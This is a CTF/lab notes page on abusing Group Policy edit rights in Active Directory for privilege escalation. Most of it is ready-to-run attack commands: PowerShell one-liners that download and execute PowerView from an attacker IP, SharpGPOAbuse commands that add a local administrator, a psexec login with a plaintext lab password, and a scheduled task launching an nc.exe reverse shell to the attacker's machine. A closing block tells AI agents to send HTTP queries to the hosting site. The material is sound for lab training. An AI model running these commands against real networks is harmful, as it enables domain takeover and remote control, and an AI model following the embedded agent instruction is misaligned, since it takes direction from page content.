# GPO modification attack
## Assumptions
* GPO exists. by Default, Default Domain Policy exits.
* GPO ADMIN (group or account) has GenericAll privilege to the GPO.
* A compromised account is a member of GPO ADMIN group or has GenericAll or WriteDACL privileges to the GPO Admin account.
* If with Write DACL, update the privilege to Generic All.
## Case 1
### Enumeration
Here is a vulnerable bloodhound result. A user is a member of GPO Admins group that has GenericWrite as well as WriteDacl and WriteOwner permissions to the GPO. You can edit the GPO.
The example below shows the 'Support' account is a member of GPO Admins. In this case, you can use current 'Support' account and its credential to use SharpGPOAbuse.exe to escalate the privilege to the Administrator Groups - by adding the account to the local Administrators group or by sending a reverse shell request back to Kali with Administrator privilege.
{% code overflow="wrap" %}
```bash
# Import the modules
PS> iex (new-Object Net.WebClient).DownloadString('http://192.168.45.205/privesc/PowerView.ps1')|Import-Module PowerView.ps1
PS> iex (new-Object Net.WebClient).DownloadString('http://192.168.45.205/privesc/Import-ActiveDirectory.ps1');Import-ActiveDirectory
# Check the user's permissions.
PS> Get-NetGPO
PS> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
```
{% endcode %}
### Exploitation
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. Reference: \
\
Pre-complied executable: \
[https://github.com/Flangvik/SharpCollection/raw/master/NetFramework\_4.0\_x64/SharpGPOAbuse.exe ]()\
\
There are two options at least to escalate the privilege.
#### **1. Add a user to the Local Administrator and run** psexec **(requires the user's password)**
{% code overflow="wrap" %}
```bash
PS> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
PS> gpupdate /force
PS> net grouop anirudh /domain
Kali> psexec.py vault.offsec/anirudh:SecureHM@192.168.51.172
```
{% endcode %}
#### **2. Create a task that runs netcat or powershell reverse shell back to Kali**
{% code overflow="wrap" %}
```bash
Kali> rlwrap nc -nlvp 53
PS> \SharpGPOAbuse.exe --AddComputerTask --TaskName "test" --Author "Administrator" --Command "cmd.exe" --Arguments "/c C:\Users\support\Documents\nc.exe 192.168.45.205 53 -e cmd.exe" --GPOName "Default Domain Policy"
PS> gpupdate /force
```
{% endcode %}
## Case 2
### Enumeration
This example shoes Amelia.Griffiths is a member of Legacy Group, which has a WriteDACL to GPOADM account, which means that Amelia.Griffiths can change the password of GPOADM account. With the GPO ADM account and its new credential, you can run pyGPOAbuse.py to escalate the privilege to the Administrators group by creating a task to add the account to the local Administrators group. Or you can create a shadow account for GPO Admin account instead of having a new credential. With the shadow account, you can run pyGPOAbuse.py to do the same.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/active-directory/group-policy-abuse/gpo-modification-attack.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.